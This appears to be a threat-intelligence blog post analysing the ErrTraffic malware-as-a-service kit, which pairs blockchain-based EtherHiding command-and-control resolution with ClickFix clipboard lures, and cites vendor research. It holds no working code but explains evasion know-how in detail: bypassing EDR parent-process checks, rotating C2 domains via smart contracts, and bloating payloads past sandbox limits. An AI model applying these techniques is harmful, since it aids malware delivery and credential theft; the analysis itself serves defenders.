There's a particular kind of dread that sets in when two well understood attacker techniques, each individually annoying but manageable, get packaged together into a single commercial product. That's exactly what's happened with ErrTraffic, a Malware as a Service (MaaS) framework that has spent the past several months quietly fusing the EtherHiding technique with the ClickFix social engineering tactic into one rentable toolkit.
Neither technique is new on its own. What's new is that they're now sold together, supported by a vendor, and actively iterated on based on customer feedback, the same way any other SaaS product evolves.
The product, not the payload
ErrTraffic first surfaced on Russian language cybercrime forums in December 2025, advertised by a threat actor operating under the handle LenAI. It wasn't pitched as malware. It was pitched as infrastructure: a Traffic Distribution System (TDS) that other criminals could rent to deliver whatever payload they wanted.
The pitch was specifically about the delivery mechanism rather than the payload itself, built around generating convincing "fake glitches" on compromised websites: corrupted text, broken CSS, cursor jitter, the visual sense that a page has actually malfunctioned. That sense of urgency is the entire point. A user who believes their browser or system is broken is far more likely to follow on screen instructions to "fix" it.
The pricing tells its own story about how this market works. Early versions sold for around $800. By 2026, monthly subscriptions had risen from $300 to $380, and the full source code climbed from $1,500 to $3,000, reaching $4,500 with lifetime updates included. Subscriptions run on a queue based rental model with a limited number of seats, deliberately restricting access to avoid attracting too much security researcher attention at once. That's a level of operational discipline you don't usually associate with cybercrime tooling, and it's a sign of how mature this segment of the market has become.
ClickFix: turning the user into the delivery mechanism
ClickFix isn't malware. It's a piece of social engineering that exploits a specific blind spot shared by browsers and endpoint detection tools.
The lure can take several forms: a fake CAPTCHA, a fake browser update notice, a fake "missing system font" warning, or a fake Blue Screen of Death. Whatever the dressing, the mechanics are identical. JavaScript on the page silently copies a malicious command to the victim's clipboard using a call like navigator.clipboard.writeText. The visible lure then instructs the user to fix the supposed problem themselves: press Windows key plus R to open the Run dialog, paste the copied text with Ctrl+V, and press Enter.
Here's the part worth dwelling on, because it's the actual technical answer to why this bypasses so much of the modern security stack: how does Win+R running PowerShell bypass what an EDR sees?
Most behavioral detection logic for suspicious PowerShell execution is built around watching what spawns the shell. A browser process spawning PowerShell is treated as inherently suspicious, because that's the classic signature of a drive by download or a malicious script being silently executed by a web page. EDR vendors have spent years tuning detections specifically for "browser process is the parent of a script interpreter."
ClickFix routes around that entirely. The parent process isn't a browser. It's explorer.exe, the Windows shell process that owns the Run dialog. From the EDR's point of view, a user opened Run and typed a command, which is something legitimate users and IT staff do constantly. There's no exploit, no malicious file landing on disk before execution, no anomalous parent child relationship for the EDR to flag. The browser's job ended the moment it wrote to the clipboard, an action that looks completely benign on its own; copying text isn't a security event. The EDR's job effectively never starts, because the process tree it's watching looks like ordinary, human driven command line use.
This is why ClickFix has become so effective so quickly. It doesn't defeat any single control through sophistication. It simply steps outside the assumptions both browser security and EDR behavioral heuristics were built on.
EtherHiding: hiding the resolver, not just the payload
If ClickFix solves the execution problem for attackers, EtherHiding solves the infrastructure problem. So, what is EtherHiding and how does it work?
EtherHiding is a Dead Drop Resolver technique. The core idea is to stop putting C2 domains directly into malicious code and instead store that information inside a smart contract on a public blockchain, most commonly Polygon or BNB Smart Chain. A smart contract is simply a small program deployed on the blockchain that can store and return data when queried. Rather than the injected JavaScript on a compromised site containing a hardcoded domain like bad-domain.example, it instead makes a read only call, technically an eth_call, to a specific smart contract address. The contract responds with the data the attacker has stored there: typically the current C2 domain, but in more advanced implementations it can also return the next stage payload, sandbox detection logic, or even the lure's HTML content itself.
The reason this is such an effective evasion technique comes down to two properties of how public blockchains work. First, an eth_call is a read only operation. It costs nothing, leaves no transaction on the blockchain's public ledger, and is functionally indistinguishable from any other application querying blockchain data, which happens constantly across legitimate Web3 applications, wallets, and trading bots. There's no on-chain record connecting the read to anything malicious. Second, there's no central authority over a public blockchain. There's no registrar to send an abuse complaint to and no single point of failure to seize, unlike a traditional domain or hosting provider.
That naturally raises the next question: how can EtherHiding infrastructure be rotated? This is where the technique becomes genuinely powerful from an attacker's perspective rather than just clever. Because the C2 domain itself lives inside the smart contract's data rather than in the injected script, the attacker can update the contract's stored value at any time, pointing it at a brand new domain, without touching a single line of code on the thousands of compromised websites already running the injector. The injection script is permanently configured to query the same contract address; only the data that contract returns changes. One of the clusters tracked in recent research updates its C2 domain roughly once a day this way. Defenders who successfully block or sinkhole today's domain accomplish nothing against tomorrow's, because the resolver mechanism that points to it never had to change.
Two clusters, one framework, a real marketplace underneath
Recent threat intelligence research split observed ErrTraffic activity into two distinct operational clusters, and the distinction is a useful illustration of how MaaS platforms actually fragment in practice.
One cluster, nicknamed "Analytics," appears to be run by a single threat actor who purchased ErrTraffic's source code outright rather than renting it. It relies on one stable smart contract, rotates its C2 domain about once daily, and has been observed exclusively distributing the Vidar infostealer.
The second, nicknamed "Beer" after its consistent use of the .beer top level domain, looks like the actual rental business. Each affiliate appears to get assigned their own dedicated smart contract tied to their own C2 domain and uploads their own choice of payload to the panel. That structure explains why the Beer cluster has been observed distributing such a wide range of malware: Vidar, Stealc, a stealer called Remus, another called Salat, and loaders including SmokeLoader. Each smart contract is effectively a different customer running their own campaign on shared infrastructure, the same logic as any multi tenant SaaS platform, just applied to malware delivery.
Researchers even found WordPress sites independently compromised by both clusters, suggesting genuine competition between separate criminal operators fighting over the same vulnerable infrastructure footprint.
When the lure impersonates the tools researchers actually use
Beyond compromised WordPress sites, the same Beer cluster infrastructure has been observed powering standalone malicious websites built to impersonate legitimate AI platforms, specifically Google's Antigravity tool and ChatGPT.
These aren't compromised legitimate sites. They're freshly registered domains designed from scratch to look like official download pages, almost certainly driven by malvertising rather than any kind of compromise. The Antigravity impersonation site, for instance, presents a multi-OS download page with the right branding and infographics, but every visible download link is a dead, empty anchor tag. The only thing the site actually does is render the ClickFix lure once a visitor lands on it.
The payload differs by lure. The fake Antigravity site's PowerShell command drops and executes an MSI file that ultimately installs the DanaBot malware family. The fake ChatGPT site takes a different evasive route worth its own explanation, because it raises a second question: what is binary bloating and how does it evade sandboxes?
Binary bloating is exactly what it sounds like. Rather than delivering a small, easily analyzed payload, the attacker pads the final executable or its surrounding archive with large amounts of junk data, inflating it to a size that creates real friction for automated analysis. In this campaign, the ChatGPT impersonation site's PowerShell command pulled down an archive exceeding 120 megabytes containing multiple files, eventually delivering a loader called HijackLoader.
The evasion logic works on two fronts. Automated sandboxes and malware analysis pipelines frequently impose practical size and time limits, partly for resource reasons and partly because static analysis tools (disassemblers, signature scanners, and the like) slow down dramatically or simply choke on extremely large files. A 120 megabyte archive can blow straight through default file size thresholds that many automated triage systems use to decide whether something gets a full analysis pass or gets waved through. It's a brute force tactic rather than a clever one, but brute force works precisely because so much of automated defense infrastructure has to draw a line somewhere on file size to remain practical at scale, and attackers know roughly where those lines tend to sit.
The choice of ChatGPT and Antigravity as lures isn't incidental either. Developers and AI researchers are a deliberately attractive target: they tend to hold elevated system privileges, and the credentials and API tokens they have access to for premium AI platforms carry real resale value on underground markets. A second domain found hosted on the same infrastructure, with a naming pattern referencing tokenized stock trading and decentralized finance, points toward the same operator also going after cryptocurrency wallets and Web3 investors.
A live example: when EtherHiding pointed to GULoader instead of an infostealer
The most useful proof that this combination isn't confined to ErrTraffic specifically came from a separate, very recently documented intrusion. A compromised WordPress site, this time a legitimate small business site in Europe, had been implanted with a backdoor styled closely on ErrTraffic's v3 architecture. The injected script followed the same general playbook: decode an obfuscated Base64 and XOR payload, then call out to a smart contract, in this instance on the BNB Smart Chain Testnet rather than Polygon, to resolve the next stage.
That naturally raises one more question worth answering directly: what is GULoader? GULoader is an in-memory shellcode downloader, frequently used as a delivery stage for a variety of infostealer and remote access trojan families rather than being a complete piece of malware on its own. Its defining trait is that it's built to operate almost entirely in memory and to actively detect and resist sandbox and analysis environments, making it a popular choice specifically as the connective tissue between an initial access technique and whatever final payload an operator actually wants to run.
In this case, the resolved command attempted to launch rundll32.exe pointed at a remote network share, using an ordinal based export call rather than a named function, a classic technique for slipping past file reputation and extension based filtering since the loaded content was never written to local disk as a recognizable executable. Endpoint telemetry confirmed the entire chain back through the Run dialog to the operating system's process creation call, proving conclusively that a human had actually pasted and executed the command rather than any automated exploit or browser triggered download doing it on their behalf. The attempt was ultimately blocked by a behavioral endpoint rule that flagged the unusual combination of a remote network path and an ordinal export call on rundll32.exe, stopping GULoader before it could fully initialize.
What matters here isn't the specific outcome. It's that the chain, EtherHiding resolving a blockchain backed dead drop straight into a ClickFix executed command, worked exactly the way the technique is supposed to, on a completely different blockchain than the one ErrTraffic's documented clusters use, delivering a completely different category of payload. The pattern has already outgrown the original toolkit's branding.
The part that keeps the cycle running
There's a feedback loop sitting underneath all of this that's worth calling out on its own, because it explains why this kind of campaign tends to accelerate rather than plateau over time.
ClickFix infections frequently deliver infostealers, and infostealers don't only harvest banking credentials. They also scoop up content management system logins: WordPress admin panels, cPanel access, and similar. Those harvested credentials then get sold or reused to compromise additional websites, which get loaded up with the next round of ClickFix lures, which infect the next batch of visitors, and the cycle continues.
This isn't a hypothetical pattern. Forensic analysis of an actual ErrTraffic victim site traced its initial compromise directly back to administrator credentials that had almost certainly been stolen by an earlier, entirely separate infostealer infection rather than any technical vulnerability being exploited. A second compromised site's admin credentials had been sitting in a known credential leak database since an infostealer theft eight months prior. The malware campaign is, in a very real sense, partially fueled by the output of its own earlier infections.
Why this combination matters more than the toolkit name
It's tempting to file ErrTraffic away as just another malware brand to track and move on. That undersells what's actually happening here.
EtherHiding and ClickFix solve two completely different problems for an attacker, and they happen to sit at two different layers of the typical defensive stack. ClickFix defeats the browser and the EDR's behavioral assumptions by making the user the one who triggers execution, with no exploit and no anomalous parent process in sight. EtherHiding defeats domain and IP based blocking by removing the C2 address from the code entirely and storing it somewhere with no central authority and no transaction trail to follow. Individually, defenders have reasonably workable answers to each. Stacked together inside a single rentable product, with a support channel and a subscription model behind it, they cover for each other's weak points in a way that's considerably harder to unwind with any single control.
The realistic expectation going forward isn't that ErrTraffic specifically gets shut down and the problem goes away. It's that this particular combination of techniques, blockchain backed dead drop resolution feeding directly into clipboard driven, user executed commands, keeps reappearing under new branding, on different blockchains, carrying different final payloads. The toolkit name is almost beside the point. The techniques are the thing actually worth tracking.
References
- Sekoia TDR, "Unveiling ErrTraffic: inside a growing ClickFix malware distribution framework" — https://blog.sekoia.io/unveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework/
- LevelBlue SpiderLabs, "Err, Hiding and Seek: How ErrTraffic v3 Leverages EtherHiding in ClickFix Campaign" — https://www.levelblue.com/blogs/spiderlabs-blog/err-hiding-and-seek-how-errtraffic-v3-leverages-etherhiding-in-clickfix-campaign
- HudsonRock / Infostealers.com, "The Industrialization of ClickFix: Inside ErrTraffic" — https://www.infostealers.com/article/the-industrialization-of-clickfix-inside-errtraffic/
- GBHackers, "WordPress Sites Hacked to Deliver GULoader" — https://gbhackers.com/wordpress-sites-to-deliver-guloader/
- Sekoia TDR, "ClearFake's New Widespread Variant: Increased Web3 Exploitation for Malware Delivery" — https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
- Guardio Labs, "EtherHiding: Hiding Web2 Malicious Code in Web3 Smart Contracts" — https://guard.io/labs/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts